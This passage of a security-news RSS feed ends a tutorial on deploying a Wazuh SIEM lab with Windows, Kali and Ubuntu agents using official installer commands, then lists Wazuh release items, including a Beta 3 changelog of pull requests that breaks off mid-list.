enrollment<br>sudo ufw allow 443/tcp    # Wazuh Web Dashboard (HTTPS)<br><br># Optional ports for future use<br>sudo ufw allow 55000/tcp  # Wazuh API<br>sudo ufw allow 514/tcp    # Syslog collector<br>sudo ufw allow 22/tcp     # SSH access to server<br><br>sudo ufw enable - Enables the UFW firewall<br>sudo ufw status numbered - Displays the current firewall status and lists all active rules with numbering</pre><p><strong>Accessing the Wazuh Web Interface</strong></p><p>After the firewall was configured to allow all essential ports, the Wazuh web dashboard was accessed via a web browser. This interface provides centralized visibility into all connected agents, system events, and security alerts.</p><pre>https://192.168.79.145:443</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*IgesWE_x72ThLyu7T2u6Zg.jpeg"></figure><p>Log in using the username and password generated during installation.</p><h3><strong>Agents Enrollment</strong></h3><p>To enroll an agent, navigate to Endpoints, Deploy new agents.</p><p><strong>Agent 1: Windows</strong></p><p>Step 1: Select windows architecture</p><p>Step 2: Enter the Wazuh Manager IP Address</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*6XDcpPc3wF4_3kHmaFA46g.jpeg"></figure><p>Step 3: Set agent name (optional)</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*8Pt49xAxtkU_j3ZPIQJANw.jpeg"></figure><p>Step 4: Copy and Run the Installation Command in Powershell. Run<strong> </strong>Powershell with administrator privileges</p><pre>Invoke-WebRequest -Uri https://packages.wazuh.com/4.x/windows/wazuh-agent-4.14.2-1.msi -OutFile $env:tmp\wazuh-agent; msiexec.exe /i $env:tmp\wazuh-agent /q WAZUH_MANAGER='192.168.79.145' WAZUH_AGENT_GROUP='default' WAZUH_AGENT_NAME='Windows'</pre><p>Step 5: Still in Powershell, run this command to start Wazuh agent</p><pre>NET START Wazuh</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*0Pip8lFhljVYCDMXbfWSTA.jpeg"></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/856/1*PKtqPkx1byKQ7hbNWB3qSg.jpeg"></figure><p><strong>Agent 2: Kali Linux</strong></p><p>On the Deploy new agent;</p><p><strong>Step 1: Select the Operating System</strong></p><ul><li>Choose <strong>Linux</strong> as the target OS.</li><li>For Kali Linux, choose DEB amd64.</li></ul><p><strong>Step 2: Assign Server Address</strong></p><ul><li>Enter your Wazuh manager’s IP address:</li></ul><p><strong>Step 3: Set Agent Name (Optional)</strong></p><ul><li>Enter a unique agent name (Kali)</li></ul><p><strong>Step 4: Copy and run the installation command</strong></p><ul><li>The UI generates a command tailored to your inputs. Run it in your Kali terminal:</li></ul><pre>wget https://packages.wazuh.com/4.x/apt/pool/main/w/wazuh-agent/wazuh-agent_4.14.2-1_amd64.deb &amp;&amp; sudo WAZUH_MANAGER='192.168.79.145' WAZUH_AGENT_GROUP='default' WAZUH_AGENT_NAME='Kali' dpkg -i ./wazuh-agent_4.14.2–1_amd64.deb</pre><p><strong>Step 5: Start and Enable the Agent</strong></p><p>Run the following commands to activate the agent:</p><pre>sudo systemctl daemon-reload<br>sudo systemctl enable wazuh-agent<br>sudo systemctl start wazuh-agent</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/931/1*yXEvvJC8fb3hn9POaHkGdA.jpeg"></figure><p><strong>Agent 3: Ubuntu</strong></p><p>Repeat the same steps as Agent 2</p><p><strong>Copy and run the installation command</strong></p><ul><li>The UI generates a command tailored to your inputs. Run it in your Ubuntu terminal:</li></ul><pre>wget https://packages.wazuh.com/4.x/apt/pool/main/w/wazuh-agent/wazuh-agent_4.14.2-1_amd64.deb &amp;&amp; sudo WAZUH_MANAGER='192.168.79.145' WAZUH_AGENT_GROUP='default' WAZUH_AGENT_NAME='Ubuntu' dpkg -i ./wazuh-agent_4.14.2-1_amd64.deb</pre><p><strong>Start and Enable the Agent</strong></p><p>Run the following commands to activate the agent:</p><pre>sudo systemctl daemon-reload<br>sudo systemctl enable wazuh-agent<br>sudo systemctl start wazuh-agent</pre><p><strong>Dashboard of all Enrolled Agents</strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*NVedJg8zql98glxWBS5wZg.jpeg"></figure><h3>Conclusion</h3><p>Through the deployment and configuration of Wazuh, I successfully set up a centralized security monitoring environment with multiple agents across Windows, Kali Linux, and Ubuntu. Wazuh provides real-time visibility into system events, log collection, and threat detection, making it a robust and open-source industry-standard SIEM solution. Beyond log monitoring, Wazuh can be leveraged for File Integrity Monitoring (FIM) to track changes in critical files and directories, detect unauthorized modifications, and alert security teams.</p><p>Additionally, it integrates seamlessly with other security tools and services, such as Syslog for centralized logging, SSH for remote administration, and custom APIs for automated workflows, enabling comprehensive and proactive security operations.</p><p>This setup serves as a foundation for future projects, where I plan to expand Wazuh’s capabilities with additional agents, advanced detection rules, integrations with threat intelligence feeds, and custom security automation workflows to simulate real-world SOC scenarios.</p><p>Many thanks to <a href="https://medium.com/u/f6fc6f913781">Efam Harris</a> 🫡</p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=09e80e1821e9" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/wazuh-siem-deployment-with-multi-os-agents-09e80e1821e9">Wazuh SIEM Deployment with Multi-OS Agents</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[coverity-w27-4.14.7: Merge pull request #37358 from wazuh/merge-4.14.6-into-4.14.7]]></title>
<description><![CDATA[Merge 4.14.6 into 4.14.7]]></description>
<link>https://tsecurity.de/de/3641965/it-security-tools/coverity-w27-4147-merge-pull-request-37358-from-wazuhmerge-4146-into-4147/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3641965/it-security-tools/coverity-w27-4147-merge-pull-request-37358-from-wazuhmerge-4146-into-4147/</guid>
<pubDate>Thu, 02 Jul 2026 20:04:12 +0200</pubDate>
<category>💾 IT Security Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Merge 4.14.6 into 4.14.7</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Wazuh v5.0.0 Beta 3]]></title>
<description><![CDATA[What's Changed

Improve cluster file synchronization error handling by @TomasTurina in #36129
Update trojan signatures to avoid false positives on modern distros by @Miguevrgo in #35927
Improve cluster merged file parameter validation by @vikman90 in #36204
Create a backup of local_rules.xml duri...]]></description>
<link>https://tsecurity.de/de/3641637/it-security-tools/wazuh-v500-beta-3/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3641637/it-security-tools/wazuh-v500-beta-3/</guid>
<pubDate>Thu, 02 Jul 2026 17:49:41 +0200</pubDate>
<category>💾 IT Security Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>What's Changed</h2>
<ul>
<li>Improve cluster file synchronization error handling by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TomasTurina/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TomasTurina">@TomasTurina</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4454599181" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36129" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36129/hovercard" href="https://github.com/wazuh/wazuh/pull/36129">#36129</a></li>
<li>Update trojan signatures to avoid false positives on modern distros by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Miguevrgo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Miguevrgo">@Miguevrgo</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4390541461" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35927" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35927/hovercard" href="https://github.com/wazuh/wazuh/pull/35927">#35927</a></li>
<li>Improve cluster merged file parameter validation by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vikman90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vikman90">@vikman90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4476621950" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36204" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36204/hovercard" href="https://github.com/wazuh/wazuh/pull/36204">#36204</a></li>
<li>Create a backup of local_rules.xml during execution of IT analysisd tier 0 1 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Antoniogm03/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Antoniogm03">@Antoniogm03</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4475277385" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36201" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36201/hovercard" href="https://github.com/wazuh/wazuh/pull/36201">#36201</a></li>
<li>Improve tmp_file path validation in cluster DAPI by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vikman90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vikman90">@vikman90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4486930454" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36246" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36246/hovercard" href="https://github.com/wazuh/wazuh/pull/36246">#36246</a></li>
<li>Revert bump main branch by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wazuhci/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wazuhci">@wazuhci</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4495350373" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36303" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36303/hovercard" href="https://github.com/wazuh/wazuh/pull/36303">#36303</a></li>
<li>Bump 4.14.7 branch by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wazuhci/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wazuhci">@wazuhci</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4496470145" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36312" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36312/hovercard" href="https://github.com/wazuh/wazuh/pull/36312">#36312</a></li>
<li>Serialize procps access to prevent modulesd crash by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cborla/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cborla">@cborla</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4489581046" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36261" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36261/hovercard" href="https://github.com/wazuh/wazuh/pull/36261">#36261</a></li>
<li>Remove obsolete configuration blocks from API upload_configuration setting by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TomasTurina/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TomasTurina">@TomasTurina</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4487498848" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36252" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36252/hovercard" href="https://github.com/wazuh/wazuh/pull/36252">#36252</a></li>
<li>Restore working vulnerability scanner database workflow by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4502088595" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36332" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36332/hovercard" href="https://github.com/wazuh/wazuh/pull/36332">#36332</a></li>
<li>Propagate agent merged_sum after hot reload in cluster by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4468736412" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36164" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36164/hovercard" href="https://github.com/wazuh/wazuh/pull/36164">#36164</a></li>
<li>Merge 4.14.7 into main by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4501542567" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36331" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36331/hovercard" href="https://github.com/wazuh/wazuh/pull/36331">#36331</a></li>
<li>Authd tier 0-1 flaky tests fix by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4504446587" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36342" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36342/hovercard" href="https://github.com/wazuh/wazuh/pull/36342">#36342</a></li>
<li>Review agent info logs by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Antoniogm03/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Antoniogm03">@Antoniogm03</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4485038079" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36234" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36234/hovercard" href="https://github.com/wazuh/wazuh/pull/36234">#36234</a></li>
<li>Fix the wazuh-manager-modules crash that occurs while downloading the feed by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Antoniogm03/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Antoniogm03">@Antoniogm03</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4503648565" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36337" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36337/hovercard" href="https://github.com/wazuh/wazuh/pull/36337">#36337</a></li>
<li>Migrate FIM DB path queries to parameterized statements by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Darioortegaleyva/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Darioortegaleyva">@Darioortegaleyva</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4517817292" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36399" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36399/hovercard" href="https://github.com/wazuh/wazuh/pull/36399">#36399</a></li>
<li>Fix AlmaLinux 9/10 bootloader permissions SCA check regex and optional file handling by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vikman90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vikman90">@vikman90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4515333133" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36396" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36396/hovercard" href="https://github.com/wazuh/wazuh/pull/36396">#36396</a></li>
<li>Cluster file processing parameter validation by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vikman90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vikman90">@vikman90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4494129534" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36296" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36296/hovercard" href="https://github.com/wazuh/wazuh/pull/36296">#36296</a></li>
<li>Add missing 4.10.2-4.10.5 and 4.8.2 entries to changelogs by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4523024537" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36407" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36407/hovercard" href="https://github.com/wazuh/wazuh/pull/36407">#36407</a></li>
<li>Treat the absence of the hash document as expected, not an error by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/juliancnn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/juliancnn">@juliancnn</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4505113598" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36355" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36355/hovercard" href="https://github.com/wazuh/wazuh/pull/36355">#36355</a></li>
<li>geo_point validation support all compatible formats by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/LucioDonda/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/LucioDonda">@LucioDonda</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4423592068" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36034" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36034/hovercard" href="https://github.com/wazuh/wazuh/pull/36034">#36034</a></li>
<li>Prevent Syscollector and SCA use-after-free on modulesd shutdown by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/nbertoldo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/nbertoldo">@nbertoldo</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4505494861" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36359" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36359/hovercard" href="https://github.com/wazuh/wazuh/pull/36359">#36359</a></li>
<li>Add cluster security model and configuration documentation by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vikman90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vikman90">@vikman90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4522930141" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36405" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36405/hovercard" href="https://github.com/wazuh/wazuh/pull/36405">#36405</a></li>
<li>Bump CB_SCAN_STARTED timeout and trigger ITs on wm_syscollector.c by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jr0me/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jr0me">@jr0me</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4527847069" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36446" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36446/hovercard" href="https://github.com/wazuh/wazuh/pull/36446">#36446</a></li>
<li>Fixed an issue in eBPF with LSM hooks and improved the health check by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MarcelKemp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MarcelKemp">@MarcelKemp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4359560869" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35838" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35838/hovercard" href="https://github.com/wazuh/wazuh/pull/35838">#35838</a></li>
<li>Validate cluster node name format by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vikman90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vikman90">@vikman90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4531591190" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36460" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36460/hovercard" href="https://github.com/wazuh/wazuh/pull/36460">#36460</a></li>
<li>eBPF libraries updated by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MarcelKemp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MarcelKemp">@MarcelKemp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4533955405" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36467" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36467/hovercard" href="https://github.com/wazuh/wazuh/pull/36467">#36467</a></li>
<li>Bump 4.14.6 branch by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wazuhci/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wazuhci">@wazuhci</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4539082172" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36517" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36517/hovercard" href="https://github.com/wazuh/wazuh/pull/36517">#36517</a></li>
<li>Revert "Bump 4.14.6 branch" by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MARCOSD4/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MARCOSD4">@MARCOSD4</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4539151411" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36518" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36518/hovercard" href="https://github.com/wazuh/wazuh/pull/36518">#36518</a></li>
<li>Bump 4.14.6 branch by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wazuhci/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wazuhci">@wazuhci</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4539251322" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36519" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36519/hovercard" href="https://github.com/wazuh/wazuh/pull/36519">#36519</a></li>
<li>Update changelog for 4.14.6 RC 1 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4539470693" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36562" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36562/hovercard" href="https://github.com/wazuh/wazuh/pull/36562">#36562</a></li>
<li>Fix policy evaluation errors by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fcontrerasc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fcontrerasc">@fcontrerasc</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4528195977" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36449" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36449/hovercard" href="https://github.com/wazuh/wazuh/pull/36449">#36449</a></li>
<li>Release startup hash gate when the reload chain fails by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jr0me/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jr0me">@jr0me</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4495215383" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36302" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36302/hovercard" href="https://github.com/wazuh/wazuh/pull/36302">#36302</a></li>
<li>Revert "Add missing 4.10.2-4.10.5 and 4.8.2 entries to changelogs" by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MarcelKemp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MarcelKemp">@MarcelKemp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4541090106" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36591" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36591/hovercard" href="https://github.com/wazuh/wazuh/pull/36591">#36591</a></li>
<li>Merge merge-4.14.7-into-main into main [automated] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wazuhci/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wazuhci">@wazuhci</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4546876084" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36624" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36624/hovercard" href="https://github.com/wazuh/wazuh/pull/36624">#36624</a></li>
<li>Restore event counter and classify received messages by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4531260982" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36456" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36456/hovercard" href="https://github.com/wazuh/wazuh/pull/36456">#36456</a></li>
<li>Unify manager integration tests workflows by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ignaciogalle12git/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ignaciogalle12git">@ignaciogalle12git</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4485169588" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36235" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36235/hovercard" href="https://github.com/wazuh/wazuh/pull/36235">#36235</a></li>
<li>Remove unused Node.js 12 from arm64 deb agent builder by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Miguevrgo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Miguevrgo">@Miguevrgo</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4467836275" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36156" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36156/hovercard" href="https://github.com/wazuh/wazuh/pull/36156">#36156</a></li>
<li>Remove unused Node.js 12 from arm deb agent builders (4.14.7) by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Miguevrgo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Miguevrgo">@Miguevrgo</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4467837119" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36157" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36157/hovercard" href="https://github.com/wazuh/wazuh/pull/36157">#36157</a></li>
<li>SCA typo bug in SELinux SCA rule for CentOS 8/9/10 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Miguevrgo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Miguevrgo">@Miguevrgo</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4514754415" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36361" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36361/hovercard" href="https://github.com/wazuh/wazuh/pull/36361">#36361</a></li>
